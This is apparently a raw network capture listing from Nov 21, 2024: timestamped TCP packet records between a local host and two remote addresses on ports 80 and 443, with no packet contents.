                                                                                                                                                                        Nov 21, 2024 10:37:48.135576010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.135637045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.135680914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.136533022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.136626005 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.137630939 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.137681007 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.137705088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.138350964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.138397932 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.138436079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.138473988 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.139264107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.139342070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.139388084 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.140187025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.140291929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.140336990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.141146898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.141247034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.141401052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.142040968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.142143965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.142955065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.142997026 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.143028975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.143870115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.143913984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.144077063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.144114017 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.144838095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.144938946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.144978046 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.145733118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.145791054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.145833015 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.146641016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.146745920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.147423983 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.147692919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.147769928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.148472071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.148513079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.148598909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.149390936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.149432898 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.149503946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.150544882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.150588989 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.150625944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.150656939 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.151316881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.151346922 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.151384115 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.152165890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.152286053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.152327061 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.153086901 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.153176069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.153402090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.153999090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.154109001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.154930115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.154969931 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.155050039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.155962944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.156013012 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.156053066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.156091928 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.157064915 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.157109976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.157155037 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.157886028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.157991886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.158031940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.158699989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.158811092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.159425974 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.159512043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.159647942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.159687996 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.160449028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.160557032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.160602093 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.161448002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.161545038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.162317038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.162384033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.162429094 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.163229942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.163269997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.163274050 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.163316965 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.164186954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.164292097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.164335966 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.165105104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.165189028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.165232897 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.165994883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.166094065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.166135073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.166913033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.167017937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.167057037 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.167845011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.167960882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.168001890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.168754101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.168853998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.168896914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.169662952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.169797897 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.170638084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.170676947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.170734882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.171417952 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.171654940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.171771049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.171811104 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.172529936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.220356941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.325582981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.325681925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.325733900 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.325875044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.326001883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.326045036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.326884985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.327028036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.327404976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.327749014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.327864885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.327903032 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.328644991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.328778982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.328823090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.329566002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.329705954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.330473900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.330523968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.330581903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.331434011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.331479073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.331513882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.331547022 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.332336903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.332448006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.332493067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.333283901 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.333363056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.333410025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.334234953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.334310055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.335113049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.335160971 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.335206032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.336034060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.336078882 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.336126089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.336164951 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.336931944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.337060928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.337102890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.337869883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.337995052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.338037968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.338783979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.338884115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.339441061 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.339730024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.339823008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.340630054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.340679884 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.340729952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.341629982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.341674089 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.341805935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.341845036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.342478037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.342592001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.342633963 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.343394995 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.343503952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.343555927 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.344347954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.344428062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.345221996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.345293999 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.345341921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.345397949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.346154928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.346272945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.346995115 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.347021103 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.347084999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.347179890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.347529888 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.347995043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.348103046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.348155975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.348953962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.349050999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.349391937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.349834919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.349953890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.350780964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.350807905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.350846052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.350881100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.351694107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.351774931 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.351811886 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.351838112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.351901054 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.351927996 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.352607965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.352828979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.353549957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.353599072 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.353634119 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.354481936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.354532003 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.354657888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.355392933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.355446100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.355485916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.355525017 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.356476068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.356570959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.356626034 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.357307911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.357460022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.358062029 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.358314037 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.358325958 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.358549118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.358627081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.358695984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.359287977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.359365940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.359426975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.359977961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.360074997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.360116959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.360894918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.361004114 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.361053944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.361821890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.361907959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.361946106 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.362770081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.362862110 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.362910032 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.363472939 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.363682032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.363789082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.364371061 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.364392042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.364556074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.364676952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.364748955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.365526915 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.365602016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.365664005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.366429090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.366468906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.366532087 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.367348909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.367460966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.368271112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.368314981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.368388891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.368577003 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.368596077 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.369174957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.369292974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.369335890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.370110989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.370167971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.370214939 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.370414972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.371023893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.371162891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.371969938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.372016907 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.372076035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.372924089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.372970104 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.373013020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.373064041 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.373754025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.423420906 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.526685953 CET8049787185.215.113.16192.168.2.6
